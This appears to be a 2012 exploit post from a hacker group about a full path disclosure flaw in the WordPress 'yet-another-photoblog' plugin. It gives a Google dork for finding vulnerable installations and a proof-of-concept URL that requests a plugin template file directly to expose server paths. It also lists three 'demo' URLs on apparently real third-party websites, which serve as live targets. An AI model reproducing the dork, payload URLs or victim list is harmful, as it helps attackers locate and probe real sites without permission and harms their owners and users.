WordPress yet-another-photoblog plugin Full path disclosure Vulnerability



EKU-ID: 2402 CVE: OSVDB-ID:
Author: KinG Of PiraTeS Published: 2012-07-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \
                                                    
================================================================================
####
# Exploit Title: WordPress yet another photoblog plugin Full path disclosure Vulnerability
# Author: KinG Of PiraTeS
# Facebook Profile: www.fb.me/cr4ck3d
# Fcabeook Page : www.fb.me/serial.crack
# E-mail: t5r@hotmail.com / cr4ck3d@offdr5cax.dz
# Web Site : www.1337day.com | www.inj3ct0rs.com
# Category:: webapps
# Google Dork: inurl:/wp-content/plugins/yet-another-photoblog/
# platform : php
# Vendor: http://wordpress.org/extend/plugins/yet-another-photoblog/
# Version: all
# Security Risk : Low ( Only for inforamtion )
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####


##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | * ------>  KinG Of PiraTeS * The g0bl!n <-------- * |
# | ------------------------------------------------- < |
###


#

1)Exploit
=========

[~] P0c [~] :
============

Vuln Upload file in :

./wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php

http://localhost/wordpress/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com

http://localhost/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com

[~] D3m0 [~] :
=============

http://wormman.org/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com
http://www.americanclublille.org/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com
http://www.54art.ch/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com

.
.

####

Peace From Algeria

####
=================================**Algerians Hackers**===============================================
# Greets To :
   KedAns-Dz & Caddy-Dz & kalashinkov3 **All Algerians Hackers** , Kondamne ,  errajol ettayeb
   (exploit-id.com) , (1337day.com) , (Sec4ever.com) , (h4ckforu.com) , (alboraaq.com)
   All My Friendz: Hanixpo , Caddy-Dz , Indoushka , Jago-dz ,saoucha , BriscO-Dz
   Over-X , Kha&miX ,Ev!LsCr!pT_Dz , T0xic , Tn_Scorpion , ..others ?___?
=====================================================================================================